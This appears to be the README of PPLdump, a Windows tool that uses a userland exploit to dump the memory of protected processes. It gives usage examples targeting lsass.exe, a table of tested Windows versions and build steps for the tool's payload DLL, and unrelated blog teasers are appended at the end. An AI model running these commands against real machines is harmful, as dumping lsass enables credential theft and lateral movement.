PPLdump implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) – in this blog post – for dumping the memory of any PPL as an administrator.
I wrote two blog posts about this tool. The first part is about Protected Processes concepts while the second one dicusses the bypass technique itself.
Usage
Simply run the executable without any argument and you will get a detailed help/usage.
c:\Temp>PPLdump64.exe
_
| _ | _ | | | | _ _
| | | || . | | | | . | version 0.4 || || |||__|||| | by @itm4n
|_|
Description:
Dump the memory of a Protected Process Light (PPL) with a userland exploit
Usage:
PPLdump.exe [-v] [-d] [-f]
Arguments:
PROC_NAME The name of a Process to dump
PROC_ID The ID of a Process to dump
DUMP_FILE The path of the output dump file
Options:
-v (Verbose) Enable verbose mode
-d (Debug) Enable debug mode (implies verbose)
-f (Force) Bypass DefineDosDevice error check
Examples:
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
Tests
| Windows version | Build | Edition | Arch | Admin | SYSTEM |
|---|---|---|---|---|---|
| Windows 10 20H2 | 19042 | Pro | x64 | ✔️ | ✔️ |
| Windows 10 20H2 | 19042 | Pro | x86 | ✔️ | ✔️ |
| Windows 10 1909 | 18363 | Pro | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Educational | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Home | x64 | ✔️ | ✔️ |
| Windows 10 1507 | 10240 | Pro | x64 | ✔️ | ✔️ |
| Windows Server 2019 | 17763 | Standard | x64 | ✔️ | ✔️ |
| Windows Server 2019 | 17763 | Essentials | x64 | ✔️ | ✔️ |
| Windows 8.1 | 9600 | Pro | x64 | ⚠️ | ⚠️ |
| Windows Server 2012 R2 | 9600 | Standard | x64 | ⚠️ | ⚠️ |
The exploit fails on fully updated Windows 8.1 / Server 2012 R2 machines. I have yet to figure out which patch caused the error.
[-] DefineDosDevice failed with error code 6 – The handle is invalid.
On Windows 8.1 / Server 2012 R2, you might also have to compile the binary statically (see “Build instructions” below).
Build Instructions
This Visual Studio Solution comprises two projects (the executable and a payload DLL) that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions. The compiled payload DLL is automatically embedded into the final executable.
Release / x64 or Release / x86 depending on the architecture of the target machine.Build > Build Solution.On Windows 8.1 / Server 2012 R2, you might have to compile the binary statically.
PPLdump project.Configuration Properties > C/C++ > Code Generation.Multi-threaded (/MT) as the Runtime Library option.Image credit:pexels.com If you think back to the early days of personal computing, you probably…
In an era defined by technological innovation, the way people handle and understand money has…
The online world becomes more visually driven with every passing year. Images spread across websites,…
General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…
How to Send POST Requests Using curl in Linux If you work with APIs, servers,…
If you are a Linux user, you have probably seen commands like chmod 777 while…